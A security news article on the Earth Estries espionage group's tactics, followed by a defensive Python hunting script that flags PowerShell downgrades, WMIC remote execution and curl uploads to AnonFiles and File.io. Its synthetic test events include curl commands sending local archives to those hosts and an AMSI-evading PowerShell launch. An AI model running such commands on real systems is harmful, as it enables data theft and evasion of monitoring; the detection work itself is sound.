
A new sophisticated cyber espionage group named Earth Estries, which overlaps with the notorious threat group FamousSparrow, has been unveiled.

The group has been active since 2020 and targets multiple government and technology organizations using hacking tools and backdoors.

Trend Micro has released a research report on the tactics and techniques used by this group.

They use PowerShell downgrade attacks to avoid detection by the logging mechanism of the Windows Antimalware Scan Interface (AMSI).

Hacker Group Attack Chain

For initial infection, the group targets accounts with administrative privileges and compromises one of the victim's internal servers.

From there, they deploy backdoors and hacking tools for lateral movement over Server Message Block (SMB) and the WMI command line (WMIC).

They use various information stealers, browser data stealers, and port scanners to advance the attack, and they commonly rely on backdoors such as Zingdoor, TrillClient, and HemiGate.

In addition, they use widely available remote-control tools such as Cobalt Strike, PlugX, or Meterpreter stagers. These tools arrive as encrypted payloads loaded by custom loader DLLs.

After each malware deployment, they archive the collected data in a folder. They target PDF and DDF files and upload them to AnonFiles or File.io via curl.exe.

To avoid detection, they deploy a new piece of malware each time they start an operation. Their C&C servers are hosted on virtual private server (VPS) services in different countries, and they use Fastly CDN services to hide their IP addresses.

They target organizations in the government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the US.

In addition, the actors abuse public services such as GitHub, Gmail, AnonFiles, and File.io to exchange commands and transfer stolen data.
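The three behaviours described above (the PowerShell downgrade used against AMSI, lateral movement through WMIC, and curl.exe uploads to AnonFiles or File.io) all leave traces in ordinary process-creation telemetry. The following hunting script is an added example written for this summary; it is not code from the article or from Trend Micro's report. It runs a few detection rules over constructed Sysmon-style process events and over a constructed Windows PowerShell Event ID 400 message. The field names (Image, CommandLine, ParentImage), the sample command lines, and the host names are assumptions made for illustration. The downgrade rule relies on the fact that the Windows PowerShell 2.0 engine predates AMSI, so forcing it with `-version 2` (or `-v 2`) bypasses AMSI scanning; Event ID 400 records the engine version that actually started, which catches the same thing from a second vantage point.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# These are synthetic lines for illustration, not telemetry from the article.
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -version 2 -NoProfile -ExecutionPolicy Bypass -File C:\Users\Public\a.ps1",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile Get-Process",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe -F "file=@C:\Users\Public\docs.rar" https://api.anonfiles.com/upload',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe -F "file=@C:\Users\Public\docs.zip" https://file.io',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -sS https://example.com/index.html",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic /node:FILESRV01 process call create "cmd.exe /c whoami"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# The PowerShell 2.0 engine has no AMSI integration, so "-version 2" / "-v 2"
# on the command line is the classic downgrade path.
POWERSHELL_DOWNGRADE = re.compile(r"(?i)\s-v(?:ersion)?\s+2(?:\.0)?\b")
# Anonymous file-hosting services named in the article as exfiltration drops.
EXFIL_HOSTS = re.compile(r"(?i)https?://(?:[\w.-]*\.)?(?:anonfiles\.com|file\.io)\b")
# curl switches that send a local file or body: -F (multipart), -T/--upload-file (PUT), -d/--data.
CURL_UPLOAD = re.compile(r"(?:^|\s)(?:-F|-T|--upload-file|-d|--data(?:-binary)?)\b")
# wmic "/node:<host> process call create" is remote process execution over WMI.
WMIC_REMOTE_EXEC = re.compile(r"(?i)/node:\S+.*process\s+call\s+create")
# Windows PowerShell Event ID 400 messages carry "EngineVersion=<major>.<minor>".
ENGINE_VERSION = re.compile(r"EngineVersion=(\d+)\.(\d+)")


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Event) -> List[str]:
    """Apply each detection rule to one process event; return the rule names that fired."""
    findings: List[str] = []
    img = image_name(event["Image"])
    cmd = event["CommandLine"]
    if img == "powershell.exe" and POWERSHELL_DOWNGRADE.search(cmd):
        findings.append("powershell_downgrade")
    # Require both an anonymous host and an upload switch, so a plain GET is not flagged.
    if img == "curl.exe" and EXFIL_HOSTS.search(cmd) and CURL_UPLOAD.search(cmd):
        findings.append("curl_exfil_anon_host")
    if img == "wmic.exe" and WMIC_REMOTE_EXEC.search(cmd):
        findings.append("wmic_remote_exec")
    return findings


def hunt(events: List[Event]) -> List[Tuple[int, str]]:
    """Run classify() over a batch and return (event index, rule name) pairs."""
    return [(i, name) for i, ev in enumerate(events) for name in classify(ev)]


def engine_started_as_v2(event400_message: str) -> bool:
    """True when a Windows PowerShell Event ID 400 message shows the 2.0 engine starting."""
    m = ENGINE_VERSION.search(event400_message)
    return bool(m) and int(m.group(1)) == 2


if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {SAMPLE_EVENTS[idx]['CommandLine']}")
    # Constructed Event ID 400 message text, abbreviated to the field that matters.
    msg = "Engine state is changed from None to Available. Details: EngineVersion=2.0 HostName=ConsoleHost"
    print("Event 400 shows v2 engine:", engine_started_as_v2(msg))
```

The curl rule deliberately demands an upload switch alongside the anonymous host, which keeps harmless downloads from the same services out of the alert queue; tune the host list to whatever drop sites your own telemetry shows. The Event ID 400 check is worth keeping even where command-line logging exists, because a downgrade can also be reached by launching the engine through other hosts that never show `-version 2` on a command line.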

Source: https://cybersecuritynews.com/earth-estries-group-hack/

Copyright © 2023 Cyber Reports Cyber Security News All Rights Reserved